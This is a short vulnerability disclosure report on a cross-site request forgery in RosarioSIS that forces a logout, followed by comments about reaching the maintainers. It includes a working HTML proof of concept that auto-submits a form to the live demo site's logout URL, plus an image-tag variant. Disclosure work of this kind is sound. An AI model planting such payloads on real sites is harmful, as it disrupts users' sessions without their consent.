Cross-Site Request Forgery (CSRF) in francoisjacquet/rosariosis
Dec 11th 2021
An attacker is able to log out a user if a logged-in user visits the attacker's website.
Proof of Concept
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://www.rosariosis.org/demonstration/index.php?modfunc=logout"> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
This vulnerability is capable of forging users to unintentional logout.
One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with
src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a
While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.
It's 2 days and I do not see the notification that you
contact the maintainer team and waiting to hear back like the normal process.
@khanhchauminh - we are still waiting for the maintainers to create a
SECURITY.md with a contactable e-mail at this stage.
Once they have done this, we will be able to send them further details.